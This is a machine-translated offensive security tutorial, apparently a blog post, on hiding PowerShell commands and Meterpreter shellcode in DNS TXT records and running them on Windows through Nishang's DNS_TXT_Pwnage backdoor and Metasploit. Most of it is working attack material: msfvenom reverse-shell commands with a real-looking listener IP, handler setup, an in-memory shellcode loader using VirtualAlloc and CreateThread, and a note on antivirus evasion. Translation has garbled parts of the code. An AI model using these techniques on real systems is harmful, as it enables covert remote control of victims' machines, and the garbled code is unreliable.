Evi1cg 2015/10/06 came about
0 x00 profile
DNS TXT records are generally used to record the description of a host name or domain name Settings. You can fill in anything here. The length is limited to 255. Most TXT records are used for SPF records (anti-spam). This article focuses on how to use Nishang to execute Powershell scripts by creating TXT records. Of course, first you have to have a domain name.
0x01 Creating TXT Records
You need to use a script from Nishang called out-dnstxt.
1. Common commands
Because common commands are short, they can be directly added to TXT records, as shown below:
Now look at the TXT record:
You can see that the record has been successfully added.
2. The script
Since the TXT record length is limited to 255, if you want to add a script to the record, you need to add multiple TXT records. Here is an example of writing a PSH script yourself:
#! powershell function Get-User { <# .SYNOPSIS Script to generate DNS TXT for a test. .DESCRIPTION Use this script to get user information. to be more big.. more big... big.. Do one thing at a time, and do well.Keep on going never give up. .EXAMPLE PS > Get-User #> [CmdletBinding()] Param () net user }Copy the codeUse out-DNSTxt to convert:
PS F:\DNS> . .\Out-DnsTxt.ps1
PS F:\DNS> Out-DnsTxt -DataToEncode .\Get-User.ps1
You need to create 2 TXT records.
All TXT Records written to F:\DNS\encodedtxt.txt
Copy the codeBecause the script is small, only two lines are produced:
You can add these two lines in sequence to 1.ps.domain.com to 2.ps.domian.com as shown below:
If you look at TXT, you can see that the content has been added:
0 x02 Powershell execution
Once the TXT records are added, execute these scripts via DNS_TXT_Pwnage. Ps1.
DNS_TXT_Pwnage. Ps1 is a backdoor script to receive commands or scripts via DNS TXT
Two more records need to be added, strat and stop, as shown below:
1. Run commands
PS F:\DNS> . .\DNS_TXT_Pwnage.ps1 PS F:\DNS> DNS_TXT_Pwnage -startdomain start.evi1cg.me -cmdstring start -commanddomain command.evi1cg.me -psstring test -psdomain xxx.evi1cg.me - Subdomains 1 -StopString stopCopy the codeExplain the parameters:
- startdomainTo create thestart.domain, returns a string;
- Cmdstring is an arbitrary string;
- Commanddomain is the domain name created in the TXT command.
- Psstring is an arbitrary string.
- Psdomain indicates the domain name or subdomain name recorded in the TXT script.
- Subdomains Indicates the number of TXT records created by executing scripts (for example, the scripts created in 1.2, this value is 2);
- StopString is any input string.
The important parameter here is startDomain, which is compared with cmdString and psString. If the value is equal to cmdString, commandDomain is executed. If the value is equal to psString, psDomain is executed.
The cmdString value is start, and the TXT record value of start.evi1cg.me is equal to the value of psString. The execution result is shown as follows:
We can execute different commands by modifying the TXT value of command-.domain. Such as the Get – Host:
2. Execute the script
PS F:\DNS> . .\DNS_TXT_Pwnage.ps1
PS F:\DNS> DNS_TXT_Pwnage -startdomain start.evi1cg.me -cmdstring bulabula -commanddomain command.evi1cg.me -psstring start -psdomain ps.evi1
cg.me -Arguments Get-User -Subdomains 2 -StopString stop
Copy the codeNote that the value of psString is start, which is the same as the TXT record of start.domain. Cmdstring is an arbitrary string. The effect is shown below:
Here more than one parameter, the Arguments to specify to perform the function name, test, found that in the script contains Chinese will fail. For scripts that require parameters, you can modify the script parameter values.
0 x03 Shellcode execution
First, we use MSF to generate a Powershell shellcode:
☁ ~ sudo msfvenom -p Windows/meterpreter/reverse_tcp -f powershell LHOST = X.X.X.X LPORT = 8887 > pspayload. TXTCopy the codeConvert the generated file using out-DNSTxt:
PS F:\DNS> Out-DnsTxt -DataToEncode .\pspayload.txt
You need to create 3 TXT records.
All TXT Records written to F:\DNS\encodedtxt.txt
Copy the codeThen add the above records to TXT records respectively, as shown below:
Test the use of 32-bit Win7 system, using MSF to enable listening:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 8887
LPORT => 8887
msf exploit(handler) > set LHOST x.x.x.x
LHOST => x.x.x.x
msf exploit(handler) > exploit
[*] Started reverse handler on x.x.x.x:8887
[*] Starting the payload handler...
Copy the codeWe also need a script to fetch the TXT record and execute it. Here I have changed a script:
#! powershell function Execute-Code { <# .PARAMETER Shelldomain The domain (or subdomain) whose subbdomain's TXT records would hold shellcode. .PARAMETER subdomains The number of subdomains which would be used to provide shellcode from their TXT records. .PARAMETER AUTHNS Authoritative Name Server for the domains. .EXAMPLE PS > Execute-Code The payload will ask for all required options. .EXAMPLE PS > Execute-Code -Shelldomain 32.alteredsecurity.com -SubDomains 5 -AUTHNS f1g1ns2.dnspod.net. Use above from non-interactive shell. #> [CmdletBinding()] Param( [Parameter(Position = 0, Mandatory = $True)] [String] $Shelldomain, [Parameter(Position = 1, Mandatory = $True)] [String] $Subdomains, [Parameter(Position = 2, Mandatory = $True)] [String] $AUTHNS ) function Get-ShellCode { Param( [Parameter()] [String] $Shelldomain ) $i = 1 while ($i -le $subdomains) { $getcommand = (Invoke-Expression "nslookup -querytype=txt $i.$Shelldomain $AUTHNS") $temp = $getcommand | select-string -pattern "`"" $tmp1 = "" $tmp1 = $tmp1 + $temp $encdata = $encdata + $tmp1 -replace '\s+', "" -replace "`"", "" $i++ } #$encdata = "" $dec = [System.Convert]::FromBase64String($encdata) $ms = New-Object System.IO.MemoryStream $Ms. Write ($dec, 0, $dec. Length) $Ms. Seek (0, 0) | Out - Null $cs = New - Object System.IO.Com pression. DeflateStream ($ms, [System.IO.Compression.CompressionMode]::Decompress) $sr = New-Object System.IO.StreamReader($cs) $sc = $sr.readtoend() return $sc } $Shell = (Get-ShellCode $Shelldomain) #Remove unrequired things from msf shellcode $tmp = $Shell -replace "`n","" -replace '\$buf \+\= ',"," -replace '\[Byte\[\]\] \$buf \=' -replace " " [Byte[]]$sc = $tmp -split ',' #Code Execution logic $code = @" [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); [DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr dest, uint src, uint count); "@ $winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru $size = 0x1000 if ($sc.Length -gt 0x1000) {$size =$sc.Length} $x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40) for ($I =0; $i -le ($sc.Length-1); $i++) {$winFunc::memset([IntPtr]($x.ToInt64()+$i), $sc[$i], $winFunc::CreateThread(0,0,$x,0,0,0) sleep 100000} Catch {[system.exception] "caught a system exception"}}Copy the codeShelldomain ** is the domain name or subdomain name for creating TXT records. Subdomains indicates the number of created TXT domain names, such as 3. AUTHNS ** is the authoritative name server for the domain, like the dogdad I used, so AUTHNS is f1g1ns2.dnspod.net
Execute on 32-bit Windows 7:
PS C:\Users\evi1cg\Desktop> . .\Execute-Code.ps1
PS C:\Users\evi1cg\Desktop> Execute-Code -Shelldomain 32.evi1cg.me -subdomains 3 -AUTHNS f1g1ns2.dnspod.net
Copy the codeSuccessfully obtaining a Meterpreter session:
If it is 64-bit, modify the payload and script.
0 x04 supplement
Metasploit contains the script dns_txt_query_exec.rb. This script queries TXT records in the order of A. domain, B. domain… Payload = payload ()
☁ ~ sudo msfvenom -p Windows/meterpreter/reverse_tcp LHOST = 103.238.225.222 LPORT = 8887 - e x86 / alpha_mixed Bufferregister=EDI -f raw > reverse.txtCopy the codeUse the following script to slice the file:
#! python #! /usr/bin/env python #coding=utf-8 def txt(string,length): return [string[x:x+length] for x in range(0,len(string),length)] with open('out.txt','w+') as f: line = open('reverse.txt','r').read() line= txt(line,255) for txts in line: f.writelines(txts+'\n\n\n\n')Copy the codeThe output is as follows:
Add these three lines respectively to the a. d. omain, b.d omain, c.d omain TXT record:
Generated exe:
Gamble ~ sudo msfvenom -p Windows /dns_txt_query_exec DNSZONE=evi1cg.me -f exe > test.exeCopy the codeMSF enable listening:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST x.x.x.x
LHOST => x.x.x.x
msf exploit(handler) > set LPORT 8887
LPORT => 8887
msf exploit(handler) > exploit
Copy the codeRun exe to get meterpreter:
As for the kill-free payload, you can generate shellcode in C format, and then use it to create a kill-free payload.
0 x05 summary
This article mainly introduces a way to execute the command and nishang script use, I hope to help you.
This article was originally published by EVI1CG and first published by Black Cloud Drops